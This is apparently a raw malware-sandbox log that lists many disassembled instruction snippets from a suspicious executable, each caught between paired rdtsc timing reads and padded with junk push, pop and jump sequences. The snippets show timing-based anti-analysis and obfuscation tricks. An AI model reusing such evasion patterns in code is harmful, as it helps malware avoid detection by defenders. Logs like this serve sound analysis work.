Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 623877 second address: 62387B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 62387B second address: 623881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 623881 second address: 623885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5CE1DB second address: 5CE1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5CE1DF second address: 5CE1E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5CE1E3 second address: 5CE1ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5CE1ED second address: 5CE263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D198Dh], esi 0x0000000e mov ebx, dword ptr [ebp+1247820Dh] 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007FC57C52C318h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e add eax, ebx 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007FC57C52C318h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a nop 0x0000004b jmp 00007FC57C52C326h 0x00000050 push eax 0x00000051 jl 00007FC57C52C324h 0x00000057 push eax 0x00000058 push edx 0x00000059 push edx 0x0000005a pop edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 5CE263 second address: 5CE2E0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC57CD4ECF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FC57CD4ECF8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 jnc 00007FC57CD4ECFCh 0x0000002b push 00000004h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007FC57CD4ECF8h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 mov di, ACE6h 0x0000004b push edi 0x0000004c mov edx, dword ptr [ebp+122D378Ah] 0x00000052 pop edx 0x00000053 nop 0x00000054 pushad 0x00000055 pushad 0x00000056 jmp 00007FC57CD4ECFEh 0x0000005b pushad 0x0000005c popad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 push esi 0x00000061 pop esi 0x00000062 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 623EB8 second address: 623EBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 629A82 second address: 629A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 629A88 second address: 629AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007FC57C52C321h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 629AAB second address: 629AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 629AB1 second address: 629AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 629AB5 second address: 629AD7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC57CD4ECF6h 0x00000008 jmp 00007FC57CD4ED08h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 629395 second address: 62939B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 62939B second address: 62939F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 62939F second address: 6293AE instructions: 0x00000000 rdtsc 0x00000002 je 00007FC57C52C316h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 6293AE second address: 6293B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\XM6cn2uNux.exe | RDTSC instruction interceptor: First address: 6293B6 second address: 6293BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6294D8 second address: 629519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED07h 0x00000007 jmp 00007FC57CD4ECFEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FC57CD4ED04h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 629695 second address: 62969B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 62C49F second address: 62C4B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a jl 00007FC57CD4ED02h 0x00000010 jl 00007FC57CD4ECF6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 62C792 second address: 62C7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 ja 00007FC57C52C31Ah 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 62C7A8 second address: 62C7CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC57CD4ECF6h 0x0000000a popad 0x0000000b popad 0x0000000c jo 00007FC57CD4ED28h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jc 00007FC57CD4ECF6h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 62C7CE second address: 62C7D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 634D05 second address: 634D15 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC57CD4ECF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 634D15 second address: 634D19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632B17 second address: 632B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632B1B second address: 632B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632B21 second address: 632B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632B2B second address: 632B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC57C52C326h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632CBF second address: 632CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632CC3 second address: 632CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632CCF second address: 632CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632CD3 second address: 632CD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632CD9 second address: 632D16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 jns 00007FC57CD4ED15h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632D16 second address: 632D27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C31Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632D27 second address: 632D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632D2D second address: 632D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632EB3 second address: 632EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632EB7 second address: 632EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 632EBD second address: 632EE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ECFBh 0x00000007 pushad 0x00000008 jnp 00007FC57CD4ECF6h 0x0000000e jmp 00007FC57CD4ED06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6331EB second address: 6331FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C31Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6331FA second address: 6331FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6337F2 second address: 63381C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC57C52C316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FC57C52C31Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC57C52C321h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 63381C second address: 633821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 633B00 second address: 633B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C325h 0x00000009 popad 0x0000000a jmp 00007FC57C52C324h 0x0000000f pop esi 0x00000010 pushad 0x00000011 jl 00007FC57C52C31Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 633E83 second address: 633E93 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC57CD4ED02h 0x00000008 jp 00007FC57CD4ECF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 63417F second address: 634183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 634423 second address: 634427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 634427 second address: 634430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 63468E second address: 6346CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC57CD4ED06h 0x0000000b popad 0x0000000c jns 00007FC57CD4ED0Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6346CA second address: 6346D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FC57C52C316h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6346D7 second address: 6346E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6346E2 second address: 6346EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC57C52C316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6346EC second address: 6346F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6349E0 second address: 6349E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 63727F second address: 637283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 637283 second address: 6372A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C327h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6372A0 second address: 6372B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED00h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6372B6 second address: 6372DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC57C52C324h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 63DAA3 second address: 63DAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 63DAA9 second address: 63DAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC57C52C324h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 6411D6 second address: 6411DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 64148E second address: 641492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 641492 second address: 641498 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 64AC94 second address: 64AC9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 64AC9C second address: 64ACA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 649184 second address: 649188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 649188 second address: 6491BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ECFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FC57CD4ECF8h 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FC57CD4ECFBh 0x00000019 pushad 0x0000001a popad 0x0000001b je 00007FC57CD4ECF6h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 649C5E second address: 649C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 649C67 second address: 649C6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 64A47A second address: 64A49B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC57C52C32Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 64A49B second address: 64A4A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 64AAF6 second address: 64AB00 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC57C52C334h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 652F83 second address: 652F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 652A49 second address: 652A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 652CD6 second address: 652CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC57CD4ECF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 661202 second address: 661208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 66137D second address: 661383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 664663 second address: 664673 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC57C52C347h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 664673 second address: 664690 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ED09h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 66C056 second address: 66C071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57C52C325h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 66C071 second address: 66C08C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC57CD4ECFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FC57CD4ECF6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 66C08C second address: 66C092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 674351 second address: 67436A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FC57CD4ED04h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67436A second address: 67436F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 674208 second address: 67420E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67CA39 second address: 67CA41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67CA41 second address: 67CA45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67CA45 second address: 67CA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B537 second address: 67B53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\XM6cn2uNux.exeRDTSC instruction interceptor: First address: 67B53D second address: 67B542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
